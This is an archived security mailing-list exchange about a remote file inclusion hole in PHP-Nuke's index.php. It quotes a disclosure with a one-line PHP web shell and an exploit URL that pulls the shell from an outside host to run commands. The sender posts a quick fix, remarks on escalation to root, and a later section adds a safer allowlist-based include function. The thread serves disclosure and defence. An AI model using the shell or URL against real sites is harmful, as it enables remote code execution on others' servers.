-------- Original Message --------
Subject: [Quick Fix] For  "PHP-Nuke allows Command Execution & Much more"
From: "Mihai (Cop) Moldovanu" <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>

Quick fix for the PHP-Nuke index.php remote file include bug:
Edit index.php and search for these lines:
        include("counter.php");
        include("$file");

and replace them with the following code:

        include("counter.php");
        if (ereg(":", $file)) {
                echo "This bug was fixed ";
                die();
        }
        include("$file");

This fix is pretty simple. If $file contains ":", that means it is probably
a remote file (ftp://, http:// ...). So simply reject it.

Handle Nopman said:
> Hi All!
>
> I've found a serious security flaw in PHP-Nuke.
> It allows user to execute any PHP code.
>
> The flaw is in the index.php's include file feature.
> It allows including files like index.php?file=file
> It prevents users including ..'s in URL's, but
> it didn't prevent users from entering http://-urls
> Remember the PHP's remote get feature...
>
> How to exploit:
> Upload this file to some free web space provider or
> setup your own server:
> <?php
> system($cmd);
> ?>
> Then just requesting
>
> http://insecure-server/index.php?file=http://where.the.bad.php.file.is/evil.php&cmd=ls%20-al
> will execute ls -al command.
> I will not upload the file anywhere to prevent too easy exploiting. (No
> script kiddies)
>
> Vendor status:
> I contacted the author on 28.12.2001 and he hasn't
> replied.
>
> Sincerely
> "Nopman"
>
>
> --
>
> Powered by Outblaze

-- 
TFM Group - Linux Division ,
Mihai Moldovanu
http://linux.tfm.ro/
http://portal.tfm.ro/
=======================================================

So, for those of you who run portals ... fix your packages.
Let me tell you why. Remember local exploits? ...
The code runs on the target machine ... So local exploits ...
It's true that PHP usually runs as nobody.nobody ...
But if the little hacker uploads, say, the local sendmail exploit (it's
just an example) ... bingo ... remote root. And I seem to recall seeing
plenty of php-nuke portals around .ro.




-- 
SysAdmin ProTv & ProFM
Mihai Moldovanu
http://www.tfm.ro/
http://portal.tfm.ro/
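
Added example, not part of the original e-mails and not PHP-Nuke code: instead of rejecting values that contain ":", the `file` parameter can be resolved against a fixed list of known pages, so nothing outside that list ever reaches `include`. The function name, page names and directory layout are assumptions made for illustration.

```php
<?php
// Added example, not PHP-Nuke code. Page names and layout are hypothetical.

/**
 * Map the user-supplied "file" parameter to a path that is safe to include.
 * Returns null when the value is not one of the known page names.
 */
function resolve_page($requested, string $baseDir, array $allowed): ?string
{
    // Query strings such as file[]=x arrive as arrays; accept strings only.
    if (!is_string($requested) || !in_array($requested, $allowed, true)) {
        return null;
    }
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . $requested . '.php');
    if ($base === false || $path === false) {
        return null; // directory or page file is missing
    }
    // Defence in depth: the resolved path must still sit under the base
    // directory (guards against a symlinked page file).
    $prefix = $base . DIRECTORY_SEPARATOR;
    return strncmp($path, $prefix, strlen($prefix)) === 0 ? $path : null;
}

// Demo with constructed data: a temporary page directory and sample inputs.
$dir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'pages_' . getmypid();
@mkdir($dir);
file_put_contents($dir . DIRECTORY_SEPARATOR . 'faq.php', "<?php echo 'FAQ page'; ?>\n");
$allowed = ['faq', 'news'];

$samples = [
    'faq',                              // known page, file exists
    'news',                             // known page, file missing
    'http://example.invalid/evil.php',  // remote URL form from the advisory
    '../faq',                           // traversal form
    ['faq'],                            // non-string input
];
foreach ($samples as $value) {
    $label = json_encode($value, JSON_UNESCAPED_SLASHES);
    $path = resolve_page($value, $dir, $allowed);
    printf("%-40s %s\n", $label, $path === null ? 'rejected' : 'include ' . $path);
}
// In index.php the call site would be:
//   $path = resolve_page($_GET['file'] ?? null, __DIR__ . '/pages', $allowed);
//   if ($path === null) { http_response_code(404); exit; }
//   include $path;
unlink($dir . DIRECTORY_SEPARATOR . 'faq.php');
rmdir($dir);
```

Independently of the code, PHP 5.2 and later provide the `allow_url_include` php.ini setting, off by default, which stops `include` from fetching URLs at all.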


